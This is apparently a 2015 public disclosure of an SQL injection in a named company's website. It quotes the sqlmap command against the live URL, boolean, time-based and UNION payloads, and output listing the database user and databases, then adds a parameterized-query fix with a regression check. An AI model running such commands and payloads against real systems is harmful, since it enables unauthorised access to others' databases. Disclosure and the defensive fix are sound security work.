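2015-09-17: Details reported to the vendor; awaiting the vendor's response.
2015-09-22: The vendor chose to ignore the vulnerability; details disclosed to the public.

A MySQL injection vulnerability exists. It requires no login, supports UNION queries, and allows the database to be dumped quickly.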
sqlmap.py -u "http://www.allyes.com/case/getinfo?id=11" -p id --current-user --current-db --dbs

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=11') AND 2789=2789 AND ('JBVT'='JBVT

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=11') AND (SELECT * FROM (SELECT(SLEEP(5)))dUAw) AND ('aKnb'='aKnb

    Type: UNION query
    Title: Generic UNION query (NULL) - 14 columns
    Payload: id=-9754') UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71767a7171,0x6c446271464262676355,0x7162766271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
-----
[20:37:28] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.12
[20:37:28] [INFO] fetching current user
current user: 'allyesweb@localhost'
[20:37:28] [INFO] fetching current database
current database: 'allyesweb'
[20:37:28] [INFO] fetching database names
[20:37:28] [INFO] the SQL query used returns 3 entries
[20:37:28] [INFO] retrieved: information_schema
[20:37:28] [INFO] retrieved: allyesweb
[20:37:29] [INFO] retrieved: test
available databases [3]:
[*] allyesweb
[*] information_schema
[*] test
Parameterized queries
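The fix named above, as an added example (not code from the report or from the affected site): the same lookup written with string concatenation and with a bound parameter, checked against the boolean-based payload from the sqlmap output. The table, column and function names are assumptions, the `WHERE (id = '...')` shape is inferred from the `')` prefix of the payloads, and sqlite3 stands in for MySQL so the block runs offline.

```python
import sqlite3

# Boolean-based probe quoted from the sqlmap output in this report, and a
# constructed always-false counterpart used only to compare responses.
PROBE_TRUE = "11') AND 2789=2789 AND ('JBVT'='JBVT"
PROBE_FALSE = "11') AND 2789=2790 AND ('JBVT'='JBVT"

def make_db():
    """In-memory stand-in for the site's database (schema and rows are constructed)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE cases (id TEXT PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO cases VALUES (?, ?)",
                   [("11", "case eleven"), ("12", "case twelve")])
    return db

def get_info_concat(db, case_id):
    """Before: the request value is pasted into the SQL text.
    The WHERE (id = '...') shape is assumed from the ') prefix of the payloads."""
    sql = "SELECT id, title FROM cases WHERE (id = '" + case_id + "')"
    return db.execute(sql).fetchall()

def get_info_param(db, case_id):
    """After: the SQL text is constant and the value travels as a bound parameter,
    so quotes and parentheses in it are compared as data, never parsed as SQL."""
    return db.execute("SELECT id, title FROM cases WHERE (id = ?)",
                      (case_id,)).fetchall()

def answers_injected_condition(lookup, db):
    """Regression check: True if the lookup's result depends on a condition
    carried inside the id value, which is what boolean-based blind detection keys on."""
    return lookup(db, PROBE_TRUE) != lookup(db, PROBE_FALSE)

if __name__ == "__main__":
    db = make_db()
    for name, lookup in (("concatenated", get_info_concat),
                         ("parameterized", get_info_param)):
        print(name, "id=11 ->", lookup(db, "11"))
        print(name, "answers injected condition:",
              answers_injected_condition(lookup, db))
```

Python MySQL drivers such as PyMySQL use `%s` as the placeholder instead of `?`; the value is still passed as a separate argument to `execute`, never formatted into the string.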
Severity: No impact (ignored by vendor)
Ignored at: 2015-09-22 10:40
Vulnerability Rank: 4 (WooYun rating)
None yet